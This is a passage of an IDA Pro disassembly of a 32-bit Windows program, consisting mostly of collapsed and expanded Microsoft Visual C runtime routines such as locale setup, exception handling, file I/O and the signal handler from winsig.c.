dd 0E0E0E0Eh, 50E0E0Eh, 7070706h, 0E0E060Eh, 9080E0Eh
dd 0B0E0E0Ah, 0E0E0C0Eh, 0CCCCCC0Dh, 0CCCCCCCCh
; [00000077 BYTES: COLLAPSED FUNCTION _write_char. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000035 BYTES: COLLAPSED FUNCTION _write_multi_char. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004A BYTES: COLLAPSED FUNCTION _write_string. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001A BYTES: COLLAPSED FUNCTION _get_int_arg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION _get_int64_arg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION _get_short_arg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000082 BYTES: COLLAPSED FUNCTION __mtinit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000029 BYTES: COLLAPSED FUNCTION __mtterm. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000019 BYTES: COLLAPSED FUNCTION __initptd. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000098 BYTES: COLLAPSED FUNCTION __getptd. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000107 BYTES: COLLAPSED FUNCTION __freeptd. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
call ds:dword_4F64F8 ; GetCurrentThreadId
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call ds:dword_4F6510 ; GetCurrentThread
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000344 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000059 BYTES: COLLAPSED FUNCTION _getSystemCP. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000050 BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
off_42A360 dd offset loc_42A33E ; DATA XREF: _CPtoLCID+27�r
dd offset loc_42A345
dd offset loc_42A34C
dd offset loc_42A353
dd offset loc_42A35A
byte_42A374 db 0 ; DATA XREF: _CPtoLCID+21�r
db 3 dup(4)
dd 4040401h, 2 dup(4040404h), 0CC030204h, 2 dup(0CCCCCCCCh)
; [00000074 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000302 BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION __getmbcp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000022 BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000125 BYTES: COLLAPSED FUNCTION __mbsnbcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000091 BYTES: COLLAPSED FUNCTION __dosmaperr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000D BYTES: COLLAPSED FUNCTION __errno. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000D BYTES: COLLAPSED FUNCTION ___doserrno. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000B BYTES: COLLAPSED FUNCTION __toupper. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000093 BYTES: COLLAPSED FUNCTION _toupper. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000012B BYTES: COLLAPSED FUNCTION _toupper_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000157 BYTES: COLLAPSED FUNCTION __stbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000094 BYTES: COLLAPSED FUNCTION __ftbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00001328 BYTES: COLLAPSED FUNCTION unknown_libname_7. PRESS KEYPAD "+" TO EXPAND]
off_42C068 dd offset loc_42AFFA ; DATA XREF: unknown_libname_7+239�r
dd offset loc_42AF80
dd offset loc_42AF98
dd offset loc_42AFDC
dd offset loc_42AF85
dd offset loc_42AFE7
dd offset loc_42AFEF
dd offset unknown_libname_8 ; Microsoft VisualC 2-8/net runtime
byte_42C088 db 0 ; DATA XREF: unknown_libname_7+233�r
db 3 dup(7)
dd 6 dup(7070707h), 2070701h, 7030707h, 7070701h, 5 dup(7070707h)
dd 7040707h, 7050707h, 2 dup(7070707h)
db 7, 6
off_42C0D6 dd offset loc_42B10B ; DATA XREF: unknown_libname_7+3C4�r
dd offset loc_42B644
dd offset loc_42BAB7
dd offset loc_42B53B
dd offset loc_42BAA2
dd offset loc_42B640
dd offset loc_42B151
dd offset loc_42B542
dd offset loc_42B176
dd offset loc_42BE8A
byte_42C0FE db 0 ; DATA XREF: unknown_libname_7+3BE�r
db 1
dd 9020202h, 9090903h, 5010409h, 9060909h, 7090901h, 0CC080909h
dd 2 dup(0CCCCCCCCh)
; [00000058 BYTES: COLLAPSED FUNCTION __hextodec. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000051 BYTES: COLLAPSED FUNCTION __inc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION __un_inc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000039 BYTES: COLLAPSED FUNCTION __whiteout. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION __frnd. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000055 BYTES: COLLAPSED FUNCTION __handle_qnan1. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000067 BYTES: COLLAPSED FUNCTION __handle_qnan2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B2 BYTES: COLLAPSED FUNCTION __except1. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000CE BYTES: COLLAPSED FUNCTION __except2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000004B1 BYTES: COLLAPSED FUNCTION __raise_exc. PRESS KEYPAD "+" TO EXPAND]
off_42C971 dd offset loc_42C8FC ; DATA XREF: __raise_exc+3FF�r
dd offset loc_42C8EA
dd offset loc_42C8D8
dd offset loc_42C8C6
align 10h
; [00000372 BYTES: COLLAPSED FUNCTION __handle_exc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000009B BYTES: COLLAPSED FUNCTION __umatherr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003A BYTES: COLLAPSED FUNCTION __set_errno. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003F BYTES: COLLAPSED FUNCTION __get_fname. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000071 BYTES: COLLAPSED FUNCTION __errcode. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003E BYTES: COLLAPSED FUNCTION __set_exp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002D BYTES: COLLAPSED FUNCTION __get_exp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000033 BYTES: COLLAPSED FUNCTION __add_exp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __set_bexp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007C BYTES: COLLAPSED FUNCTION __sptype. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000139 BYTES: COLLAPSED FUNCTION __decomp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000016 BYTES: COLLAPSED FUNCTION __statfp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION __clrfp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000032 BYTES: COLLAPSED FUNCTION __ctrlfp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000075 BYTES: COLLAPSED FUNCTION __set_statfp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005E BYTES: COLLAPSED FUNCTION __ms_p5_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000042 BYTES: COLLAPSED FUNCTION __ms_p5_mp_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000A8 BYTES: COLLAPSED FUNCTION __forcdecpt. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000D7 BYTES: COLLAPSED FUNCTION __cropzeros. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002D BYTES: COLLAPSED FUNCTION __positive. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000048 BYTES: COLLAPSED FUNCTION __fassign. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000076 BYTES: COLLAPSED FUNCTION __cftoe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000166 BYTES: COLLAPSED FUNCTION __cftoe2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000006A BYTES: COLLAPSED FUNCTION __cftof. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000013D BYTES: COLLAPSED FUNCTION __cftof2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E5 BYTES: COLLAPSED FUNCTION __cftog. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005F BYTES: COLLAPSED FUNCTION __cfltcvt. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002E BYTES: COLLAPSED FUNCTION __shift. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000EF BYTES: COLLAPSED FUNCTION ___InternalCxxFrameHandler. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000002A0 BYTES: COLLAPSED FUNCTION FindHandler(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,uchar,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; [00000115 BYTES: COLLAPSED FUNCTION FindHandlerForForeignException(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,int,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B6 BYTES: COLLAPSED FUNCTION TypeMatch(_s_HandlerType const *,_s_CatchableType const *,_s_ThrowInfo const *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000F7 BYTES: COLLAPSED FUNCTION ___FrameUnwindToState. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002C BYTES: COLLAPSED FUNCTION sub_42E0D0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B7 BYTES: COLLAPSED FUNCTION unknown_libname_17. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000DD BYTES: COLLAPSED FUNCTION CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
; [0000005E BYTES: COLLAPSED FUNCTION sub_42E29D. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000014 BYTES: COLLAPSED CHUNK OF FUNCTION CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000042 BYTES: COLLAPSED FUNCTION ExFilterRethrow(_EXCEPTION_POINTERS *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000027B BYTES: COLLAPSED FUNCTION BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000086 BYTES: COLLAPSED FUNCTION _DestructExceptionObject(EHExceptionRecord *,uchar). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000046 BYTES: COLLAPSED FUNCTION ___AdjustPointer. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004C BYTES: COLLAPSED FUNCTION unknown_libname_18. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000006C BYTES: COLLAPSED FUNCTION terminate(void). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp short loc_42E784
; [00000005 BYTES: COLLAPSED FUNCTION j__abort. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; [00000011 BYTES: COLLAPSED CHUNK OF FUNCTION terminate(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION unexpected(void). PRESS KEYPAD "+" TO EXPAND]
db 5Dh ; ]
db 0C3h ;
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_42E7C0 proc near ; CODE XREF: _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *)+23�p
; _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *):loc_42152D�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042E830 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43E380
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
cmp off_4553D0, 0
jz short loc_42E81C
mov [ebp+var_4], 1
call off_4553D0 ; terminate(void)
mov [ebp+var_4], 0
jmp short loc_42E81C
; ---------------------------------------------------------------------------
loc_42E80C: ; DATA XREF: .rdata:0043E390�o
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_42E812: ; DATA XREF: .rdata:0043E394�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_42E81C: ; CODE XREF: sub_42E7C0+34�j
; sub_42E7C0+4A�j
mov [ebp+var_4], 0FFFFFFFFh
call j_?terminate@@YAXXZ ; terminate(void)
sub_42E7C0 endp
; ---------------------------------------------------------------------------
db 0EBh ;
db 6
; [00000005 BYTES: COLLAPSED FUNCTION terminate(void). PRESS KEYPAD "+" TO EXPAND]
db 0C3h ;
; START OF FUNCTION CHUNK FOR sub_42E7C0
db 8Bh ;
db 4Dh ; M
db 0F0h ;
db 64h ; d
db 89h ;
db 0Dh
db 0
db 0
db 0
db 0
db 5Fh ; _
db 5Eh ; ^
db 5Bh ; [
db 8Bh ;
db 0E5h ;
db 5Dh ; ]
db 0C3h ;
; END OF FUNCTION CHUNK FOR sub_42E7C0
align 10h
; [000000EE BYTES: COLLAPSED FUNCTION ___loctotime_t. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000003EF BYTES: COLLAPSED FUNCTION _setlocale. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000193 BYTES: COLLAPSED FUNCTION __setlocale_set_cat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000100 BYTES: COLLAPSED FUNCTION __setlocale_get_all. PRESS KEYPAD "+" TO EXPAND]
; [00000184 BYTES: COLLAPSED FUNCTION __expandlocale. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F160 proc near ; CODE XREF: __setlocale_set_cat+12B�p
; DATA XREF: .data:off_4554E8�o
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_42F160 endp
; ---------------------------------------------------------------------------
align 10h
; [0000004F BYTES: COLLAPSED FUNCTION __strcats. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000015D BYTES: COLLAPSED FUNCTION ___lc_strtolc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000065 BYTES: COLLAPSED FUNCTION ___lc_lctostr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000082 BYTES: COLLAPSED FUNCTION __lseek. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B2 BYTES: COLLAPSED FUNCTION __lseek_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000062 BYTES: COLLAPSED FUNCTION _ftell. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000029A BYTES: COLLAPSED FUNCTION __ftell_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000082 BYTES: COLLAPSED FUNCTION __write. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000273 BYTES: COLLAPSED FUNCTION __write_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000305 BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000050 BYTES: COLLAPSED FUNCTION _strncnt. PRESS KEYPAD "+" TO EXPAND]
; [000001BE BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000059 BYTES: COLLAPSED FUNCTION _xcptlookup. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BC BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000149 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000D8 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000424 BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000219 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000324 BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000009B BYTES: COLLAPSED FUNCTION __ioterm. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000049 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001BF BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000050 BYTES: COLLAPSED FUNCTION __GET_RTERRMSG. PRESS KEYPAD "+" TO EXPAND]
; [000000DA BYTES: COLLAPSED FUNCTION __fcloseall. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000042 BYTES: COLLAPSED FUNCTION __itoa. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000C2 BYTES: COLLAPSED FUNCTION _xtoa. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003F BYTES: COLLAPSED FUNCTION __ltoa. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001E BYTES: COLLAPSED FUNCTION __ultoa. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000048 BYTES: COLLAPSED FUNCTION __i64toa. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000F2 BYTES: COLLAPSED FUNCTION x64toa(x,x,x,x,x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION __ui64toa. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
sub esp, 10h
push esi
cmp dword ptr [ebp+0Ch], 4
jz short loc_4313D3
cmp dword ptr [ebp+0Ch], 3
jnz short loc_4313D8
loc_4313D3: ; CODE XREF: .text:004313CB�j
jmp loc_4315A8
; ---------------------------------------------------------------------------
loc_4313D8: ; CODE XREF: .text:004313D1�j
cmp dword ptr [ebp+8], 2
jz short loc_4313F4
cmp dword ptr [ebp+8], 15h
jz short loc_4313F4
cmp dword ptr [ebp+8], 16h
jz short loc_4313F4
cmp dword ptr [ebp+8], 0Fh
jnz loc_4314D1
loc_4313F4: ; CODE XREF: .text:004313DC�j
; .text:004313E2�j ...
push 1
call __lock
add esp, 4
cmp dword ptr [ebp+8], 2
jz short loc_43140A
cmp dword ptr [ebp+8], 15h
jnz short loc_43144F
loc_43140A: ; CODE XREF: .text:00431402�j
cmp dword_4F49BC, 0
jnz short loc_43144F
push 1
push offset _ctrlevent_capture@4 ; ctrlevent_capture(x)
call ds:dword_4F642C ; SetConsoleCtrlHandler
cmp eax, 1
jnz short loc_431431
mov dword_4F49BC, 1
jmp short loc_43144F
; ---------------------------------------------------------------------------
loc_431431: ; CODE XREF: .text:00431423�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov esi, eax
call ___doserrno
mov [eax], esi
push 1
call __unlock
add esp, 4
jmp loc_4315A8
; ---------------------------------------------------------------------------
loc_43144F: ; CODE XREF: .text:00431408�j
; .text:00431411�j ...
mov eax, [ebp+8]
mov [ebp-10h], eax
mov ecx, [ebp-10h]
sub ecx, 2
mov [ebp-10h], ecx
cmp dword ptr [ebp-10h], 14h
ja short loc_4314C2
mov eax, [ebp-10h]
xor edx, edx
mov dl, ds:byte_4315CF[eax]
jmp ds:off_4315BB[edx*4]
loc_431476: ; DATA XREF: .text:off_4315BB�o
mov ecx, dword_4F49AC
mov [ebp-0Ch], ecx
mov edx, [ebp+0Ch]
mov dword_4F49AC, edx
jmp short loc_4314C2
; ---------------------------------------------------------------------------
loc_43148A: ; CODE XREF: .text:0043146F�j
; DATA XREF: .text:004315C3�o
mov eax, dword_4F49B0
mov [ebp-0Ch], eax
mov ecx, [ebp+0Ch]
mov dword_4F49B0, ecx
jmp short loc_4314C2
; ---------------------------------------------------------------------------
loc_43149D: ; CODE XREF: .text:0043146F�j
; DATA XREF: .text:004315C7�o
mov edx, dword_4F49B4
mov [ebp-0Ch], edx
mov eax, [ebp+0Ch]
mov dword_4F49B4, eax
jmp short loc_4314C2
; ---------------------------------------------------------------------------
loc_4314B0: ; CODE XREF: .text:0043146F�j
; DATA XREF: .text:004315BF�o
mov ecx, dword_4F49B8
mov [ebp-0Ch], ecx
mov edx, [ebp+0Ch]
mov dword_4F49B8, edx
loc_4314C2: ; CODE XREF: .text:00431462�j
; .text:0043146F�j ...
push 1
call __unlock
add esp, 4
jmp loc_4315A3
; ---------------------------------------------------------------------------
loc_4314D1: ; CODE XREF: .text:004313EE�j
cmp dword ptr [ebp+8], 8
jz short loc_4314E8
cmp dword ptr [ebp+8], 4
jz short loc_4314E8
cmp dword ptr [ebp+8], 0Bh
jz short loc_4314E8
jmp loc_4315A8
; ---------------------------------------------------------------------------
loc_4314E8: ; CODE XREF: .text:004314D5�j
; .text:004314DB�j ...
call __getptd
mov [ebp-4], eax
mov eax, [ebp-4]
cmp dword ptr [eax+50h], offset dword_455528
jnz short loc_431545
push 133h
push offset aWinsig_c ; "winsig.c"
push 2
mov ecx, dword_4555A8
push ecx
call __malloc_dbg
add esp, 10h
mov edx, [ebp-4]
mov [edx+50h], eax
mov eax, [ebp-4]
cmp dword ptr [eax+50h], 0
jz short loc_431543
mov ecx, dword_4555A8
push ecx
push offset dword_455528
mov edx, [ebp-4]
mov eax, [edx+50h]
push eax
call _memcpy
add esp, 0Ch
jmp short loc_431545
; ---------------------------------------------------------------------------
loc_431543: ; CODE XREF: .text:00431524�j
jmp short loc_4315A8
; ---------------------------------------------------------------------------
loc_431545: ; CODE XREF: .text:004314FA�j
; .text:00431541�j
mov ecx, [ebp-4]
mov edx, [ecx+50h]
push edx
mov eax, [ebp+8]
push eax
call _siglookup
add esp, 8
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_431563
jmp short loc_4315A8
; ---------------------------------------------------------------------------
loc_431563: ; CODE XREF: .text:0043155F�j
mov ecx, [ebp-8]
mov edx, [ecx+8]
mov [ebp-0Ch], edx
loc_43156C: ; CODE XREF: .text:loc_4315A1�j
mov eax, [ebp-8]
mov ecx, [eax+4]
cmp ecx, [ebp+8]
jnz short loc_4315A3
mov edx, [ebp-8]
mov eax, [ebp+0Ch]
mov [edx+8], eax
mov ecx, [ebp-8]
add ecx, 0Ch
mov [ebp-8], ecx
mov edx, dword_4555AC
imul edx, 0Ch
mov eax, [ebp-4]
mov ecx, [eax+50h]
add ecx, edx
cmp [ebp-8], ecx
jb short loc_4315A1
jmp short loc_4315A3
; ---------------------------------------------------------------------------
loc_4315A1: ; CODE XREF: .text:0043159D�j
jmp short loc_43156C
; ---------------------------------------------------------------------------
loc_4315A3: ; CODE XREF: .text:004314CC�j
; .text:00431575�j ...
mov eax, [ebp-0Ch]
jmp short loc_4315B6
; ---------------------------------------------------------------------------
loc_4315A8: ; CODE XREF: .text:loc_4313D3�j
; .text:0043144A�j ...
call __errno
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_4315B6: ; CODE XREF: .text:004315A6�j
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
off_4315BB dd offset loc_431476 ; DATA XREF: .text:0043146F�r
dd offset loc_4314B0
dd offset loc_43148A
dd offset loc_43149D
dd offset loc_4314C2
byte_4315CF db 0 ; DATA XREF: .text:00431469�r
dd 3 dup(4040404h), 4040401h, 3020404h, 3 dup(0CCCCCCCCh)
; [00000092 BYTES: COLLAPSED FUNCTION ctrlevent_capture(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000020A BYTES: COLLAPSED FUNCTION _raise. PRESS KEYPAD "+" TO EXPAND]
off_43189A dd offset loc_4316C8 ; DATA XREF: _raise+31�r
dd offset loc_431733
dd offset loc_431719
dd offset loc_4316E5
dd offset loc_4316FF
dd offset loc_43175E
byte_4318B2 db 0 ; DATA XREF: _raise+2B�r
db 5
dd 5050501h, 1050501h, 2050505h, 5050505h, 0CC040305h
dd 2 dup(0CCCCCCCCh)
; [0000005B BYTES: COLLAPSED FUNCTION _siglookup. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000D BYTES: COLLAPSED FUNCTION unknown_libname_20. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000D BYTES: COLLAPSED FUNCTION ___pxcptinfoptrs. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BB BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001E2 BYTES: COLLAPSED FUNCTION __alloc_osfhnd. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B7 BYTES: COLLAPSED FUNCTION __set_osfhnd. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000D8 BYTES: COLLAPSED FUNCTION __free_osfhnd. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000066 BYTES: COLLAPSED FUNCTION __get_osfhandle. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000104 BYTES: COLLAPSED FUNCTION __open_osfhandle. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000086 BYTES: COLLAPSED FUNCTION __lock_fhandle. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000026 BYTES: COLLAPSED FUNCTION __unlock_fhandle. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000D2 BYTES: COLLAPSED FUNCTION unknown_libname_21. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001BC BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000C7 BYTES: COLLAPSED FUNCTION __getbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003F BYTES: COLLAPSED FUNCTION __open. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000050E BYTES: COLLAPSED FUNCTION __sopen. PRESS KEYPAD "+" TO EXPAND]
off_43289E dd offset loc_43247E ; DATA XREF: __sopen+E7�r
dd offset loc_432487
dd offset loc_432490
dd offset loc_432499
dd offset loc_4324A2
byte_4328B2 db 0 ; DATA XREF: __sopen+E1�r
db 4
dd 3 dup(4040404h), 4010404h, 3 dup(4040404h), 4020404h
dd 3 dup(4040404h), 0CC030404h, 3 dup(0CCCCCCCCh)
; [00000032 BYTES: COLLAPSED FUNCTION __isatty. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000077 BYTES: COLLAPSED FUNCTION _wctomb. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000A0 BYTES: COLLAPSED FUNCTION __wctomb_lk. PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION _mbtowc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000015E BYTES: COLLAPSED FUNCTION __mbtowc_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION __allshl. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000066 BYTES: COLLAPSED FUNCTION _ungetc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000013E BYTES: COLLAPSED FUNCTION _ungetc_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432E00 proc near ; CODE XREF: __umatherr+5A�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_432E00 endp
; ---------------------------------------------------------------------------
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION __statusfp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __clearfp. PRESS KEYPAD "+" TO EXPAND]
; [0000004F BYTES: COLLAPSED FUNCTION __control87. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001A BYTES: COLLAPSED FUNCTION __controlfp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000058 BYTES: COLLAPSED FUNCTION __fpreset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000179 BYTES: COLLAPSED FUNCTION __abstract_cw. PRESS KEYPAD "+" TO EXPAND]
align 10h
